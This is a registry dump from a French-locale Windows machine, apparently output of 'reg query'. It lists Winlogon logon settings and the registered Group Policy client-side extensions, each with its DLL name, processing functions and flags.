        CachedLogonsCount    REG_SZ    10
        DebugServerCommand    REG_SZ    no
        ForceUnlockLogon    REG_DWORD    0x0
        LegalNoticeCaption    REG_SZ    
        LegalNoticeText    REG_SZ    
        PasswordExpiryWarning    REG_DWORD    0x5
        PowerdownAfterShutdown    REG_SZ    0
        ShutdownWithoutLogon    REG_SZ    0
        WinStationsDisabled    REG_SZ    0
        DisableCAD    REG_DWORD    0x1
        scremoveoption    REG_SZ    0
        ShutdownFlags    REG_DWORD    0x2b
        AutoAdminLogon    REG_SZ    0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{0ACDD40C-75AC-47ab-BAA0-BF6DE7E7FE63}
        (par défaut)    REG_SZ    Wireless Group Policy
        DisplayName    REG_EXPAND_SZ    @wlgpclnt.dll,-100
        ProcessGroupPolicyEx    REG_SZ    ProcessWLANPolicyEx
        GenerateGroupPolicy    REG_SZ    GenerateWLANPolicy
        DllName    REG_EXPAND_SZ    wlgpclnt.dll
        NoUserPolicy    REG_DWORD    0x1
        NoGPOListChanges    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{0E28E245-9368-4853-AD84-6DA3BA35BB75}
        (par défaut)    REG_SZ    Group Policy Environment
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyEnviron
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyEnviron
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExEnviron
        EventSources    REG_SZ    (Group Policy Environment,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-1
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{17D89FEC-5C44-4972-B12D-241CAEF74509}
        (par défaut)    REG_SZ    Group Policy Local Users and Groups
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyLocUsAndGroups
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyLocUsAndGroups
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExLocUsAndGroups
        EventSources    REG_SZ    (Group Policy Local Users and Groups,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-2
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{1A6364EB-776B-4120-ADE1-B63A406A76B5}
        (par défaut)    REG_SZ    Group Policy Device Settings
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyDevices
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyDevices
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExDevices
        EventSources    REG_SZ    (Group Policy Device Settings,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-3
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{25537BA6-77A8-11D2-9B6C-0000F8080861}
        (par défaut)    REG_SZ    Folder Redirection
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyEx
        DllName    REG_EXPAND_SZ    fdeploy.dll
        NoMachinePolicy    REG_DWORD    0x1
        NoSlowLink    REG_DWORD    0x1
        PerUserLocalSettings    REG_DWORD    0x1
        NoGPOListChanges    REG_DWORD    0x0
        NoBackgroundPolicy    REG_DWORD    0x0
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicy
        EventSources    REG_MULTI_SZ    (Folder Redirection,Application)
        DisplayName    REG_EXPAND_SZ    @fdeploy.dll,-261
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{3610eda5-77ef-11d2-8dc5-00c04fa31a66}
        (par défaut)    REG_SZ    Microsoft Disk Quota
        DisplayName    REG_EXPAND_SZ    @%SystemRoot%\System32\dskquota.dll,-100
        NoMachinePolicy    REG_DWORD    0x0
        NoUserPolicy    REG_DWORD    0x1
        NoSlowLink    REG_DWORD    0x1
        NoBackgroundPolicy    REG_DWORD    0x1
        NoGPOListChanges    REG_DWORD    0x1
        PerUserLocalSettings    REG_DWORD    0x0
        RequiresSuccessfulRegistry    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x0
        DllName    REG_EXPAND_SZ    %SystemRoot%\System32\dskquota.dll
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicy
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{3A0DBA37-F8B2-4356-83DE-3E90BD5C261F}
        (par défaut)    REG_SZ    Group Policy Network Options
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyNetworkOptions
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyNetworkOptions
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExNetworkOptions
        EventSources    REG_SZ    (Group Policy Network Options,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-4
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{426031c0-0b47-4852-b0ca-ac3d37bfcb39}
        (par défaut)    REG_SZ    QoS Packet Scheduler
        DisplayName    REG_EXPAND_SZ    @gptext.dll,-201
        ProcessGroupPolicy    REG_SZ    ProcessPSCHEDPolicy
        DllName    REG_EXPAND_SZ    gptext.dll
        NoUserPolicy    REG_DWORD    0x1
        NoGPOListChanges    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{42B5FAAE-6536-11d2-AE5A-0000F87571E3}
        (par défaut)    REG_SZ    Scripts
        ProcessGroupPolicy    REG_SZ    ProcessScriptsGroupPolicy
        DllName    REG_EXPAND_SZ    gpscript.dll
        GenerateGroupPolicy    REG_SZ    GenerateScriptsGroupPolicy
        NoSlowLink    REG_DWORD    0x1
        ProcessGroupPolicyEx    REG_SZ    ProcessScriptsGroupPolicyEx
        NoGPOListChanges    REG_DWORD    0x1
        NotifyLinkTransition    REG_DWORD    0x1
        DisplayName    REG_EXPAND_SZ    @gpscript.dll,-1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4bcd6cde-777b-48b6-9804-43568e23545d}
        (par défaut)    REG_SZ    Remote Desktop USB Redirection
        DllName    REG_EXPAND_SZ    %SystemRoot%\System32\TsUsbRedirectionGroupPolicyExtension.dll
        RequiresSuccessfulRegistry    REG_DWORD    0x1
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyEx
        NoGPOListChanges    REG_DWORD    0x1
        NoUserPolicy    REG_DWORD    0x1
        DisplayName    REG_EXPAND_SZ    @%SystemRoot%\System32\TsUsbRedirectionGroupPolicyExtension.dll,-100
        NoBackgroundPolicy    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{4CFB60C1-FAA6-47f1-89AA-0B18730C9FD3}
        (par défaut)    REG_SZ    Internet Explorer Zonemapping
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyForZoneMap
        DllName    REG_SZ    C:\Windows\System32\iedkcs32.dll
        RequiresSuccessfulRegistry    REG_DWORD    0x1
        NoGPOListChanges    REG_DWORD    0x1
        DisplayName    REG_SZ    @C:\Windows\System32\iedkcs32.dll,-3051
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{5794DAFD-BE60-433f-88A2-1A31939AC01F}
        (par défaut)    REG_SZ    Group Policy Drive Maps
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyDrives
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyDrives
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExDrives
        EventSources    REG_SZ    (Group Policy Drive Maps,Application)
        NoMachinePolicy    REG_DWORD    0x1
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-5
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
        NoBackgroundPolicy    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{6232C319-91AC-4931-9385-E70C2B099F0E}
        (par défaut)    REG_SZ    Group Policy Folders
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyFolders
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyFolders
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExFolders
        EventSources    REG_SZ    (Group Policy Folders,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-6
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{6A4C88C6-C502-4f74-8F60-2CB23EDC24E2}
        (par défaut)    REG_SZ    Group Policy Network Shares
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyNetShares
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyNetShares
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExNetShares
        EventSources    REG_SZ    (Group Policy Network Shares,Application)
        NoUserPolicy    REG_DWORD    0x1
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-7
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{6cfb9c5c-138e-4bb3-8a3d-d5383e910e57}
        (par défaut)    REG_SZ    Remote Desktop Protocol Extension
        DllName    REG_EXPAND_SZ    %SystemRoot%\System32\RdpGroupPolicyExtension.dll
        RequiresSuccessfulRegistry    REG_DWORD    0x1
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyEx
        NoGPOListChanges    REG_DWORD    0x1
        NoUserPolicy    REG_DWORD    0x1
        DisplayName    REG_EXPAND_SZ    @%SystemRoot%\System32\RdpGroupPolicyExtension.dll,-100
        NoBackgroundPolicy    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7150F9BF-48AD-4da4-A49C-29EF4A8369BA}
        (par défaut)    REG_SZ    Group Policy Files
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyFiles
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyFiles
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExFiles
        EventSources    REG_SZ    (Group Policy Files,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-8
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{728EE579-943C-4519-9EF7-AB56765798ED}
        (par défaut)    REG_SZ    Group Policy Data Sources
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyDataSources
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyDataSources
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExDataSources
        EventSources    REG_SZ    (Group Policy Data Sources,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-9
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{74EE6C03-5363-4554-B161-627540339CAB}
        (par défaut)    REG_SZ    Group Policy Ini Files
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyIniFile
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyIniFile
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExIniFile
        EventSources    REG_SZ    (Group Policy Ini Files,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-10
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{7B849a69-220F-451E-B3FE-2CB811AF94AE}
        (par défaut)    REG_SZ    Internet Explorer User Accelerators
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyForActivities
        DllName    REG_SZ    C:\Windows\System32\iedkcs32.dll
        RequiresSuccessfulRegistry    REG_DWORD    0x1
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyForActivitiesEx
        NoGPOListChanges    REG_DWORD    0x1
        DisplayName    REG_SZ    @C:\Windows\System32\iedkcs32.dll,-3051
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}
        (par défaut)    REG_SZ    Security
        DisplayName    REG_EXPAND_SZ    @(runtime.system32)\scecli.dll,-7650
        ProcessGroupPolicy    REG_SZ    SceProcessSecurityPolicyGPO
        GenerateGroupPolicy    REG_SZ    SceGenerateGroupPolicy
        ExtensionRsopPlanningDebugLevel    REG_DWORD    0x1
        ProcessGroupPolicyEx    REG_SZ    SceProcessSecurityPolicyGPOEx
        ExtensionDebugLevel    REG_DWORD    0x1
        DllName    REG_EXPAND_SZ    scecli.dll
        NoUserPolicy    REG_DWORD    0x1
        NoGPOListChanges    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
        MaxNoGPOListChangesInterval    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{8A28E2C5-8D06-49A4-A08C-632DAA493E17}
        (par défaut)    REG_SZ    Deployed Printer Connections
        DisplayName    REG_EXPAND_SZ    @%systemroot%\system32\gpprnext.dll,-1
        DllName    REG_EXPAND_SZ    %systemroot%\system32\gpprnext.dll
        EnableAsynchronousProcessing    REG_DWORD    0x1
        ExtensionEventSource    REG_SZ    
        GenerateGroupPolicy    REG_SZ    PrinterGenerateGroupPolicy
        MaxNoGPOListChangesInterval    REG_DWORD    0x0
        NoBackgroundPolicy    REG_DWORD    0x0
        NoGPOListChanges    REG_DWORD    0x0
        NoMachinePolicy    REG_DWORD    0x0
        NoSlowLink    REG_DWORD    0x1
        NotifyLinkTransition    REG_DWORD    0x0
        NoUserPolicy    REG_DWORD    0x0
        PerUserLocalSettings    REG_DWORD    0x0
        ProcessGroupPolicy    REG_SZ    PrinterProcessGroupPolicy
        ProcessGroupPolicyEx    REG_SZ    PrinterProcessGroupPolicyEx
        RequiresSuccessfulRegistry    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{91FBB303-0CD5-4055-BF42-E512A681B325}
        (par défaut)    REG_SZ    Group Policy Services
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyServices
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyServices
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExServices
        EventSources    REG_SZ    (Group Policy Services,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-11
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{A3F3E39B-5D83-4940-B954-28315B82F0A8}
        (par défaut)    REG_SZ    Group Policy Folder Options
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyFolderOptions
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyFolderOptions
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExFolderOptions
        EventSources    REG_SZ    (Group Policy Folder Options,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-12
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{AADCED64-746C-4633-A97C-D61349046527}
        (par défaut)    REG_SZ    Group Policy Scheduled Tasks
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicySchedTasks
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicySchedTasks
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExSchedTasks
        EventSources    REG_SZ    (Group Policy Scheduled Tasks,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-13
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{B087BE9D-ED37-454f-AF9C-04291E351182}
        (par défaut)    REG_SZ    Group Policy Registry
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyRegistry
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyRegistry
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExRegistry
        EventSources    REG_SZ    (Group Policy Registry,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-14
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{B587E2B1-4D59-4e7e-AED9-22B9DF11D053}
        (par défaut)    REG_SZ    802.3 Group Policy
        DisplayName    REG_EXPAND_SZ    @dot3gpclnt.dll,-100
        ProcessGroupPolicyEx    REG_SZ    ProcessLANPolicyEx
        GenerateGroupPolicy    REG_SZ    GenerateLANPolicy
        DllName    REG_EXPAND_SZ    dot3gpclnt.dll
        NoUserPolicy    REG_DWORD    0x1
        NoGPOListChanges    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{BC75B1ED-5833-4858-9BB8-CBF0B166DF9D}
        (par défaut)    REG_SZ    Group Policy Printers
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyPrinters
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyPrinters
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExPrinters
        EventSources    REG_SZ    (Group Policy Printers,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-16
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{C418DD9D-0D14-4efb-8FBF-CFE535C8FAC7}
        (par défaut)    REG_SZ    Group Policy Shortcuts
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyShortcuts
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyShortcuts
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExShortcuts
        EventSources    REG_SZ    (Group Policy Shortcuts,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-17
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{C631DF4C-088F-4156-B058-4375F0853CD8}
        (par défaut)    REG_SZ    Microsoft Offline Files
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicy
        DllName    REG_EXPAND_SZ    %SystemRoot%\System32\cscobj.dll
        RequiresSuccessfulRegistry    REG_DWORD    0x1
        NoSlowLink    REG_DWORD    0x0
        NoGPOListChanges    REG_DWORD    0x0
        NoUserPolicy    REG_DWORD    0x0
        NoMachinePolicy    REG_DWORD    0x0
        PerUserLocalSettings    REG_DWORD    0x0
        EnableAsynchronousProcessing    REG_DWORD    0x1
        NoBackgroundPolicy    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{c6dc5466-785a-11d2-84d0-00c04fb169f7}
        (par défaut)    REG_SZ    Software Installation
        RequiresSucessfulRegistry    REG_DWORD    0x0
        DllName    REG_EXPAND_SZ    appmgmts.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicy
        NoSlowLink    REG_DWORD    0x1
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyObjectsEx
        EventSources    REG_MULTI_SZ    (Application Management,Application)\0(MsiInstaller,Application)
        NoUserPolicy    REG_DWORD    0x0
        DisplayName    REG_EXPAND_SZ    @appmgmts.dll,-3252
        PerUserLocalSettings    REG_DWORD    0x1
        NoBackgroundPolicy    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{cdeafc3d-948d-49dd-ab12-e578ba4af7aa}
        (par défaut)    REG_SZ    TCPIP
        DisplayName    REG_EXPAND_SZ    @gptext.dll,-204
        ProcessGroupPolicy    REG_SZ    ProcessTCPIPPolicy
        DllName    REG_EXPAND_SZ    gptext.dll
        NoUserPolicy    REG_DWORD    0x1
        NoGPOListChanges    REG_DWORD    0x1
        RequiresSuccessfulRegistry    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{CF7639F3-ABA2-41DB-97F2-81E2C5DBFC5D}
        (par défaut)    REG_SZ    Internet Explorer Machine Accelerators
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyForActivities
        DllName    REG_SZ    C:\Windows\System32\iedkcs32.dll
        RequiresSuccessfulRegistry    REG_DWORD    0x1
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyForActivitiesEx
        NoGPOListChanges    REG_DWORD    0x1
        DisplayName    REG_SZ    @C:\Windows\System32\iedkcs32.dll,-3051
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{e437bc1c-aa7d-11d2-a382-00c04f991e27}
        (par défaut)    REG_SZ    IP Security
        ProcessGroupPolicyEx    REG_SZ    ProcessIPSECPolicyEx
        GenerateGroupPolicy    REG_SZ    GenerateIPSECPolicy
        DllName    REG_EXPAND_SZ    %SystemRoot%\System32\polstore.dll
        NoUserPolicy    REG_DWORD    0x1
        NoGPOListChanges    REG_DWORD    0x0
        DisplayName    REG_EXPAND_SZ    @C:\Windows\system32\polstore.dll,-5012
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{E47248BA-94CC-49c4-BBB5-9EB7F05183D0}
        (par défaut)    REG_SZ    Group Policy Internet Settings
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyInternet
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyInternet
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExInternet
        EventSources    REG_SZ    (Group Policy Internet Settings,Application)
        NoMachinePolicy    REG_DWORD    0x1
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-18
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{E4F48E54-F38D-4884-BFB9-D4D2E5729C18}
        (par défaut)    REG_SZ    Group Policy Start Menu Settings
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyStartMenu
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyStartMenu
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExStartMenu
        EventSources    REG_SZ    (Group Policy Start Menu Settings,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-19
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{E5094040-C46C-4115-B030-04FB2E545B00}
        (par défaut)    REG_SZ    Group Policy Regional Options
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyRegionOptions
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyRegionOptions
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExRegionOptions
        EventSources    REG_SZ    (Group Policy Regional Options,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-20
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{E62688F0-25FD-4c90-BFF5-F508B9D2E31F}
        (par défaut)    REG_SZ    Group Policy Power Options
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyPowerOptions
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyPowerOptions
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExPowerOptions
        EventSources    REG_SZ    (Group Policy Power Options,Application)
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-21
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{f3ccc681-b74c-4060-9f26-cd84525dca2a}
        (par défaut)    REG_SZ    Audit Policy Configuration
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyEx
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicy
        DllName    REG_EXPAND_SZ    auditcse.dll
        NoUserPolicy    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
        MaxNoGPOListChangesInterval    REG_DWORD    0x3c0
        ForceRefreshFG    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{F9C77450-3A41-477E-9310-9ACD617BD9E3}
        (par défaut)    REG_SZ    Group Policy Applications
        ProcessGroupPolicy    REG_SZ    ProcessGroupPolicyApplications
        DllName    REG_EXPAND_SZ    gpprefcl.dll
        GenerateGroupPolicy    REG_SZ    GenerateGroupPolicyApplications
        ProcessGroupPolicyEx    REG_SZ    ProcessGroupPolicyExApplications
        EventSources    REG_SZ    (Group Policy Applications,Application)
        NoMachinePolicy    REG_DWORD    0x1
        DisplayName    REG_EXPAND_SZ    @gpprefcl.dll,-15
        PerUserLocalSettings    REG_DWORD    0x1
        EnableAsynchronousProcessing    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{FB2CA36D-0B40-4307-821B-A13B252DE56C}
        (par défaut)    REG_SZ    Enterprise QoS
        DisplayName    REG_EXPAND_SZ    @gptext.dll,-203
        ProcessGroupPolicy    REG_SZ    ProcessEQoSPolicy
        DllName    REG_EXPAND_SZ    gptext.dll
        RequiresSuccessfulRegistry    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{fbf687e6-f063-4d9f-9f4f-fd9a26acdd5f}
        (par défaut)    REG_SZ    CP
        DisplayName    REG_EXPAND_SZ    @gptext.dll,-205
